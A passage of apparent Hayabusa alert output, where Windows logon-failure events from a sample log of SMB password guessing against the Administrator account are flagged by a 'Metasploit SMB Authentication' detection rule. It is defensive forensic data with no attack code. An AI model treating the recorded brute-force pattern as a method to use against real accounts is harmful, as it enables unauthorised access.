SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lBg39AUtzZi6Q4iz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huv5YEPo1n7UiFkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9CLLwao1NDtBulxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SB88EHHhDWhvJI87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBvklueV4MZo3pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: noha7Vw85VfURHik : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wl5eIYvoKpJGUcSl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsS3JTLUWcFYvxAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM6hj2bGxC124oZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3IQkVcY5iMTxCRN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v44Kp3lpGKb6Xd4j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1skdEmGlXbzUWk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feaA6lAxWjapFbAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IJZjTqY5innWcvSZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymXIp0KTw0vIbB0N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpPJEcLv7BoZaQwT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cz14Cv861RhFh0Pa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H8BklDHdS0cdcbGu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0m5Mznl2khRMj31V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ha6TuN7C8V0roSAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9oBW0yE5a9zSkpIH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n54EaKOUQIX9geqx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m6WCg3o4oatO42wW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KfCwo8ZUWiBqI8zC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8potisENMIsbNxcd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgagMNj95dkg9uQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1EVsGLFugwePvgR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q00SeueJQAiBGpe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWzSR1cJ2XJNirSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39MY5ZvRJSHVkZZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WyOdltctwdHNkH6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUcWk0xJn9zVMZSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2sauqNlJi3y0ZBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: bkih5QcLlcjw9gjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3KlUJslcpS9jhLY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: riuVWV1Ugr9c22hR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OSj1I0sXkPf96OL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsOJDxDiZSjoBj6F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uH0bQ9zEi1xcfHn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3AfNT0p4JC1VEfDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7T8R8U1WVHZQrYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kamexpa7isWT8gLC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8CyHFKVcdTo0Upx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: U30aMcZuBD08GWK1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4mihftSCNCYdlBny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K2wa0xwK6tnurGJQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0V3TbNrKEnrDcEYt : IP Address: 192.168.198.149 : AuthPackage: 
